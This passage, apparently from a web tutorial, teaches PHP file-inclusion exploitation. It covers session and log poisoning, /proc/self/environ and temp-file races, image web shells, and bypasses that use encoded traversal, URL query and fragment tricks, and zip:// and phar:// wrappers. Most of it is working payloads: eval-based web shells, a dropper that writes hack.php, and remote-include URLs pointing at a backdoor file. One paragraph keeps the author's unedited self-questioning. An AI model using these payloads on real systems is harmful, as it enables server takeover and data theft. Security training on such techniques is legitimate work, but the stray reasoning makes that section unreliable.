<li><code>/tmp/sess_PHPSESSID</code></li> <li><code>/tmp/sessions/sess_PHPSESSID</code></li> </ol> <p>Session file naming: <code>sess_[phpsessid]</code>. PHPSESSID can be found in the cookie field of the request.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0d3kp3apqgzurs7d1iaj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0d3kp3apqgzurs7d1iaj.png" alt=" " width="800" height="153"></a></p> <p>To include and exploit, the attacker must control some session file content. No general solution exists. Sometimes, include the session file first, observe its contents, then find controllable variables to inject payloads and execute PHP code.</p> <p><strong>Example 1:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="c1"># Line 3</span> <span class="nb">session_start</span><span class="p">();</span> <span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span> <span class="p">{</span> <span class="nb">header</span><span class="p">(</span><span class="s1">'Location: index.php'</span><span class="p">);</span> <span class="k">exit</span><span class="p">;</span> <span class="p">}</span> <span class="c1"># Line 8</span> <span class="k">if</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span> <span class="p">{</span> <span class="nv">$username</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span> <span class="c1"># Line 20</span> <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="nf">bind_result</span><span class="p">(</span><span class="nv">$res_password</span><span class="p">);</span> <span class="c1"># Line 24</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$res_password</span> <span class="o">==</span> <span class="nv">$password</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nv">$username</span><span class="p">);</span> <span class="nb">header</span><span class="p">(</span><span class="s2">"location:index.php"</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>The variable <code>$username</code> is controllable and written to <code>$_SESSION</code>. If the data is unfiltered, it ends up in the session file. Combined with file inclusion, the session file may be included.</p> <p>To include the session file, the path must be known. Register a user (e.g., Johnson). After successful login, note the PHPSESSID cookie value (e.g., <code>0d0385dc6a1067f4e3406191</code>). Even a failed login creates a session file.</p> <p>Visit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>http://x.x.x.x/index.php?action<span class="o">=</span>/var/lib/php5/sess_0d0385dc6a1067f4e3406191 </code></pre> </div> <p>However, the username is base64-encoded. Using a pseudo-protocol to decode the entire session file may cause garbled characters due to the serialised prefix. Consider base64 encoding. The session prefix <code>username|s:12:"</code> (the number <code>12</code> is the length of the base64 string). For lengths &lt;100, the prefix is 15 characters; for 100–999, it is 16 characters.</p> <p>16 characters satisfy: 16 * 6 = 96 bits, 96 mod 8 = 0. Thus, when base64-decoding the session file, the first 16 characters become garbled but do not affect the remaining part (the base64-encoded username). Register a username like <code>JohnsonJohnson...</code> (long enough that its base64 length exceeds 100) plus <code>&lt;?php eval($_GET['abcdefg']) ?&gt;</code>. Then visit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="n">http</span><span class="o">://</span><span class="n">x</span><span class="mf">.</span><span class="n">x</span><span class="mf">.</span><span class="n">x</span><span class="mf">.</span><span class="n">x</span><span class="o">/</span><span class="n">index</span><span class="mf">.</span><span class="n">php</span><span class="o">?</span><span class="n">action</span><span class="o">=</span><span class="n">php</span><span class="o">://</span><span class="n">filter</span><span class="o">/</span><span class="n">read</span><span class="o">=</span><span class="n">convert</span><span class="mf">.</span><span class="n">base64</span><span class="o">-</span><span class="n">decode</span><span class="o">/</span><span class="n">resource</span><span class="o">=/</span><span class="k">var</span><span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">php5</span><span class="o">/</span><span class="n">sess_0d0385dc6a1067f4e3406191</span><span class="o">&amp;</span><span class="n">abcdefg</span><span class="o">=</span><span class="nb">phpinfo</span><span class="p">();</span> </code></pre> </div> <p>Successful execution leads to a web shell.</p> <p><strong>Example 2:</strong><br> <code>session.php</code> with controllable user session:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>session_start<span class="o">()</span><span class="p">;</span> <span class="nv">$username</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="o">[</span><span class="s1">'username'</span><span class="o">]</span><span class="p">;</span> <span class="nv">$_SESSION</span><span class="o">[</span><span class="s1">'username'</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$username</span><span class="p">;</span> </code></pre> </div> <p>Register a user with <code>&lt;?php phpinfo();?&gt;</code> and log in with that username. Record PHPSESSID (e.g., <code>r7csmqpu1lul3elgsb6o9g6u1b</code>). The session file contains the malicious code.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55np44ugj8jqhv1g6cme.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55np44ugj8jqhv1g6cme.png" alt=" " width="757" height="128"></a></p> <p>Include it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="n">fileinclude</span><span class="mf">.</span><span class="n">php</span><span class="o">?</span><span class="n">file</span><span class="o">=</span><span class="nc">D</span><span class="o">:</span><span class="n">\phpStudy\PHPTutorial\tmp\tmp\sess_r7csmqpu1lul3elgsb6o9g6u1b</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnypwtr61ecqrp7nt921v.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnypwtr61ecqrp7nt921v.png" alt=" " width="800" height="164"></a></p> <p><strong>Note on Command Execution and Trojan Writing:</strong> Replace <code>&lt;?php phpinfo();?&gt;</code> with the desired PHP code.</p> <h3> Including Log Files </h3> <h4> Access Logs </h4> <p><strong>Requirements:</strong> Know the server log storage path, and log files must be readable.</p> <p><strong>Technique:</strong></p> <p>Web servers (e.g., Apache) write requests to <code>access.log</code> and errors to <code>error.log</code>. Default paths:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="mi">1</span><span class="p">.</span> <span class="n">Apache</span><span class="o">+</span><span class="n">Linux</span><span class="p">:</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">httpd</span><span class="o">/</span><span class="n">logs</span><span class="o">/</span><span class="n">access</span><span class="p">.</span><span class="n">log</span> <span class="ow">or</span> <span class="o">/</span><span class="n">var</span><span class="o">/</span><span class="n">log</span><span class="o">/</span><span class="n">httpd</span><span class="o">/</span><span class="n">access</span><span class="p">.</span><span class="n">log</span> <span class="mi">2</span><span class="p">.</span> <span class="n">Apache</span><span class="o">+</span><span class="n">Win2003</span><span class="p">:</span> <span class="n">D</span><span class="p">:</span><span class="err">\</span><span class="n">xampp</span><span class="err">\</span><span class="n">apache</span><span class="err">\</span><span class="n">logs</span><span class="err">\</span><span class="n">access</span><span class="p">.</span><span class="n">log</span><span class="p">,</span> <span class="n">D</span><span class="p">:</span><span class="err">\</span><span class="n">xampp</span><span class="err">\</span><span class="n">apache</span><span class="err">\</span><span class="n">logs</span><span class="err">\</span><span class="n">error</span><span class="p">.</span><span class="n">log</span> <span class="mi">3</span><span class="p">.</span> <span class="n">IIS6</span><span class="p">.</span><span class="mi">0</span><span class="o">+</span><span class="n">Win2003</span><span class="p">:</span> <span class="n">C</span><span class="p">:</span><span class="err">\</span><span class="n">WINDOWS</span><span class="err">\</span><span class="n">system32</span><span class="err">\</span><span class="n">Logfiles</span> <span class="mi">4</span><span class="p">.</span> <span class="n">IIS7</span><span class="p">.</span><span class="mi">0</span><span class="o">+</span><span class="n">Win2003</span><span class="p">:</span> <span class="o">%</span><span class="n">SystemDrive</span><span class="o">%</span><span class="err">\</span><span class="n">inetpub</span><span class="err">\</span><span class="n">logs</span><span class="err">\</span><span class="n">LogFiles</span> <span class="mi">5</span><span class="p">.</span> <span class="n">nginx</span><span class="p">:</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="kd">local</span><span class="o">/</span><span class="n">nginx</span><span class="o">/</span><span class="n">logs</span><span class="o">/</span> <span class="p">(</span><span class="ow">or</span> <span class="n">installation</span> <span class="n">directory</span><span class="p">)</span> </code></pre> </div> <p>Direct requests may cause encoding issues. Use Burp to modify the request, e.g., change <code>&lt;?php phpinfo();?&gt;</code> to <code>%3C?php%20phpinfo();%20?%3E</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ew6bidde3x5p74xk72z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ew6bidde3x5p74xk72z.png" alt=" " width="800" height="299"></a></p> <p>After writing PHP code to <code>/var/log/apache2/access.log</code>, include it.</p> <p>Default configuration file paths:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight markdown"><code><span class="p">1.</span> Apache+Linux: /etc/httpd/conf/httpd.conf or /etc/init.d/httpd <span class="p">2.</span> IIS6.0+Win2003: C:/Windows/system32/inetsrv/metabase.xml <span class="p">3.</span> IIS7.0+WIN: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\i</span>netsrv<span class="se">\c</span>onfig<span class="se">\a</span>pplicationHost.config </code></pre> </div> <p><strong>Note on Command Execution and Trojan Writing:</strong> Replace <code>&lt;?php phpinfo();?&gt;</code> with the desired PHP code, encode as needed, and include.</p> <h4> SSH Log </h4> <p><strong>Requirements:</strong> Know the SSH log location and have read access. Default: <code>/var/log/auth.log</code> or <code>/var/log/secure</code>.</p> <p><strong>Technique:</strong></p> <p>Connect via SSH:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh <span class="s1">'&lt;?php phpinfo(); ?&gt;'</span>@remotehost </code></pre> </div> <p>Enter any password. The PHP code is written to the SSH log.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fafuebui1w87pfdfwg1h7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fafuebui1w87pfdfwg1h7.png" alt=" " width="798" height="111"></a></p> <p>Then include the log file.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbs4mbkjfoevl8uxf4c8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbs4mbkjfoevl8uxf4c8.png" alt=" " width="607" height="170"></a></p> <p><strong>Note on Command Execution and Trojan Writing:</strong> Replace <code>&lt;?php phpinfo();?&gt;</code> with the desired PHP code.</p> <h3> Including environ </h3> <p><strong>Requirements:</strong></p> <ol> <li>PHP runs as CGI (so that <code>environ</code> retains the User-Agent header).</li> <li> <code>environ</code> file location is known and readable. Default: <code>/proc/self/environ</code> (Linux only; not available on Windows).</li> </ol> <p><strong>Technique:</strong></p> <p><code>/proc/self/environ</code> saves the User-Agent header. Insert PHP code into the User-Agent, then include the file.</p> <p>Example: intercept a request with Burp and modify the User-Agent:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foii3exscy8q4kjd2prke.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foii3exscy8q4kjd2prke.png" alt=" " width="800" height="212"></a></p> <p>Then include <code>/proc/self/environ</code>:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzl74csp73b09i6eczs8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzl74csp73b09i6eczs8.png" alt=" " width="482" height="148"></a></p> <p><strong>Note on Command Execution and Trojan Writing:</strong> Replace <code>&lt;?php phpinfo();?&gt;</code> with the desired PHP code.</p> <h3> Including fd (File Descriptors) </h3> <p>File descriptors (fd) are non‑negative integers returned by the kernel when a file is opened. Default location: <code>/proc/self/fd/</code> (Linux only). Similar to including <code>environ</code>.</p> <p><strong>Note on Command Execution and Trojan Writing:</strong> Same as including <code>environ</code>.</p> <h3> Including Uploaded Files </h3> <p>Many websites offer file upload (e.g., avatars, documents). Upload a web shell disguised as an image.</p> <p><strong>Requirements:</strong> Know the uploaded file's path and name.</p> <p><strong>Technique:</strong></p> <p>Create an image‑based web shell. Two methods:</p> <ol> <li>Using the command line: combine a legitimate image (<code>1.jpg</code>) with a PHP file (<code>2.php</code>) containing <code>fputs(fopen('hack.php','w'),'&lt;?php @eval($_POST[v])?&gt;');?&gt;</code>: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> copy 1.jpg/b+2.php 3.jpg </code></pre> </div> <ol> <li>Upload <code>3.jpg</code> to the server (e.g., <code>/upload/202107.jpg</code>). Then include it: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> http://x.x.x.x/index.php?page=./upload/202107.jpg </span></code></pre> </div> <p>This creates <code>hack.php</code> in the same directory as <code>index.php</code>, which can be connected with a shell management tool.</p> <p>Command execution is also possible.</p> <h3> Including Temporary Files </h3> <p>Principle diagram:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi60244uwiw0jcxr8l956.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi60244uwiw0jcxr8l956.png" alt=" " width="799" height="458"></a></p> <p>When PHP uploads a file, a temporary file is created (Linux: <code>/tmp/php[6 random chars]</code>, Windows: <code>c:\windows\temp</code>). Compete to include the temporary file before it is deleted.</p> <p>The temporary filename can be guessed (Linux randomness flaws; Windows only 65535 possibilities) or obtained from <code>phpinfo</code> page (PHP variables expose the uploaded file's temporary path and name).</p> <p><strong>Requirements:</strong> <code>phpinfo</code> page and file inclusion vulnerability.</p> <p><strong>Principle:</strong></p> <ol> <li>When sending a POST with a file block, PHP saves a temporary file (e.g., <code>/tmp/phpXXXXXX</code>), deleted after request.</li> <li> <code>phpinfo</code> displays all variables, including <code>$_FILES</code>, revealing the temporary filename.</li> </ol> <p><strong>Technique (Linux only):</strong> Use the script from <a href="https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py" rel="noopener noreferrer">vulhub/exp.py</a>. It includes the temporary file, which contains:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nf">fileputcontents</span><span class="p">(</span><span class="s1">'/tmp/p'</span><span class="p">,</span><span class="s1">'&lt;?=eval($_REQUEST[1])?&gt;'</span><span class="p">)</span><span class="cp">?&gt;</span> </code></pre> </div> <p>Successful inclusion creates a permanent file <code>/tmp/p</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4y5wof8nqniwmrsd4oqe.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4y5wof8nqniwmrsd4oqe.png" alt=" " width="800" height="188"></a></p> <p>Then include <code>/tmp/p</code> to execute arbitrary commands.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7b52at99u3o1w0jplwp3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7b52at99u3o1w0jplwp3.png" alt=" " width="800" height="132"></a></p> <p>The script uses race conditions: send a large request to <code>phpinfo</code>, fill with garbage to inflate the output buffer (default 4096 bytes). Read the socket in 4096‑byte chunks; as soon as the temporary filename is found, send the inclusion request before the first socket closes (so the temp file still exists).</p> <h3> Other Inclusion Techniques </h3> <p>Web services may use other services (FTP, databases) that produce files. Specific analysis required (e.g., SMTP logs) – not covered here.</p> <h2> Bypass Techniques </h2> <p>In real scenarios, inclusion is rarely as simple as <code>include $_GET['file'];</code>. Often, prefixes and suffixes are added. Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'file'</span><span class="p">];</span> <span class="k">include</span> <span class="s1">'/var/www/html/'</span><span class="mf">.</span><span class="nv">$file</span><span class="mf">.</span><span class="s1">'/test/test.php'</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <h3> Bypassing a Fixed Prefix </h3> <p>Test code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'file'</span><span class="p">];</span> <span class="k">include</span> <span class="s1">'/var/www/html/'</span><span class="mf">.</span><span class="nv">$file</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <p>(Note: On Windows, backslashes in the prefix may cause issues; use forward slashes for directory traversal.)</p> <h4> Solution: Directory Traversal </h4> <p>If <code>/var/log/test.txt</code> contains <code>&lt;?php phpinfo();?&gt;</code>, use <code>../</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>include.php?file<span class="o">=</span>../../log/test.txt </code></pre> </div> <p>The server concatenates to <code>/var/www/html/../../log/test.txt</code> → <code>/var/log/test.txt</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flgx7pvcsh0eeu0waxok6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flgx7pvcsh0eeu0waxok6.png" alt=" " width="798" height="118"></a></p> <h4> Solution: Encoding Bypass </h4> <p>Servers often filter <code>../</code>. Encodings can bypass:</p> <p><strong>1. URL encoding</strong></p> <ul> <li> <code>../</code> → <code>%2e%2e%2f</code>, <code>..%2f</code>, <code>%2e%2e/</code> </li> <li> <code>..\</code> → <code>%2e%2e%5c</code>, <code>..%5c</code>, <code>%2e%2e\</code> </li> </ul> <p><strong>2. Double encoding</strong></p> <ul> <li> <code>../</code> → <code>%252e%252e%252f</code> </li> <li> <code>..\</code> → <code>%252e%252e%255c</code> </li> </ul> <p><strong>3. Container/server‑specific encoding</strong></p> <ul> <li> <code>..%c0%af</code> (see <a href="https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work" rel="noopener noreferrer">Why does Directory traversal attack %C0%AF work?</a>)</li> <li> <code>%c0%ae%c0%ae/</code> (Java: <code>%c0%ae</code> → <code>\uC0AE</code> → <code>.</code>)</li> <li><code>..%c1%9c</code></li> </ul> <h3> Bypassing a Fixed Suffix </h3> <p>Test code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'file'</span><span class="p">];</span> <span class="k">include</span> <span class="nv">$file</span><span class="mf">.</span><span class="s1">'/test/test.php'</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <h4> Solution: URL Query and Fragment </h4> <p>URL format: <code>protocol://hostname[:port]/path[;parameters][?query]#fragment</code></p> <p>For RFI (<code>allow_url_fopen=On</code>, <code>allow_url_include=On</code>):</p> <p><strong>Technique 1: Query (<code>?</code>)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>index.php?file<span class="o">=</span>http://remoteaddr/remoteinfo.txt? </code></pre> </div> <p>Included file becomes <code>http://remoteaddr/remoteinfo.txt?/test/test.php</code> – the suffix is treated as a query.</p> <p><strong>Command execution / Trojan writing example:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">http://x.x.x.x/fileinclude2.php?file=http://x.x.x.x/backdoor.php? </span></code></pre> </div> <p>where <code>backdoor.php</code> contains <code>&lt;?php system('whoami'); ?&gt;</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7impqvociy002tje8yy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7impqvociy002tje8yy.png" alt=" " width="799" height="184"></a></p> <p>Replace with a web‑shell writing payload to get a shell.</p> <p><strong>Technique 2: Fragment (<code>#</code> or <code>%23</code>)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight perl"><code><span class="nb">index</span><span class="o">.</span><span class="nv">php</span><span class="p">?</span><span class="nv">file</span><span class="o">=</span><span class="nv">http:</span><span class="sr">//</span><span class="nv">remoteaddr</span><span class="o">/</span><span class="nv">remoteinfo</span><span class="o">.</span><span class="nv">txt</span><span class="o">%</span><span class="mi">23</span> </code></pre> </div> <p>Included file: <code>http://remoteaddr/remoteinfo.txt#/test/test.php</code> – the suffix becomes a fragment. URL-encode <code>#</code> as <code>%23</code>.</p> <p><strong>Command execution example:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">http://x.x.x.x/fileinclude2.php?file=http://x.x.x.x/backdoor.php%23 </span></code></pre> </div> <p><strong>Difference between Windows and Linux:</strong></p> <ul> <li>Linux works as above.</li> <li>On Windows, both <code>?</code> and <code>#</code> (even unencoded) work; no special encoding needed.</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwef59k8pmdosfr58zmug.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwef59k8pmdosfr58zmug.png" alt=" " width="800" height="156"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23qod72s857mq0p4f57t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23qod72s857mq0p4f57t.png" alt=" " width="799" height="206"></a></p> <h4> Solution: Using Pseudo‑Protocols </h4> <p>Test code with suffix:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'file'</span><span class="p">];</span> <span class="k">include</span> <span class="nv">$file</span><span class="mf">.</span><span class="s1">'/test/test.php'</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <p><strong>Technique 1: <code>zip://</code></strong></p> <p>Construct a ZIP archive (e.g., <code>J0.zip</code>) containing a file <code>J0/test.php</code> (since the suffix appends <code>/test/test.php</code>, we want the inner file to be named appropriately). Let the inner file be <code>J0</code>? Actually, the include is <code>$file . '/test/test.php'</code>. If we set <code>$file</code> to <code>zip://path/to/archive.zip#inner</code>, then the full path becomes <code>zip://.../archive.zip#inner/test/test.php</code>. So the inner file should be <code>inner/test/test.php</code>? Let's follow the example: they created <code>J0.zip</code> with a file <code>J0</code> (no extension) containing <code>&lt;?php phpinfo(); ?&gt;</code>. Then they used <code>fileinclude2.php?file=zip://D:\phpStudy\PHPTutorial\WWW\J0.zip%23J0</code>. The concatenated string becomes <code>zip://D:\phpStudy\PHPTutorial\WWW\J0.zip#J0/test/test.php</code>. That works because the pseudo‑protocol treats everything after <code>#</code> as the inner file path.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxobc11euk8b5auwk01mx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxobc11euk8b5auwk01mx.png" alt=" " width="800" height="320"></a></p> <p>Test content:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2h0anwy0qirt9np6ypdb.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2h0anwy0qirt9np6ypdb.png" alt=" " width="800" height="305"></a></p> <p><strong>Technique 2: <code>phar://</code></strong> (requires PHP &gt;= 5.3.4)</p> <p>Using the same ZIP archive. Absolute path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight cpp"><code><span class="n">fileinclude2</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">file</span><span class="o">=</span><span class="n">phar</span><span class="o">:</span><span class="c1">//D:\phpStudy\PHPTutorial\WWW\J0.zip\J0</span> </code></pre> </div> <p>Concatenated: <code>phar://D:\phpStudy\PHPTutorial\WWW\J0.zip\J0/test/test.php</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flaeusq6rxw0wvynvd1jn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flaeusq6rxw0wvynvd1jn.png" alt=" 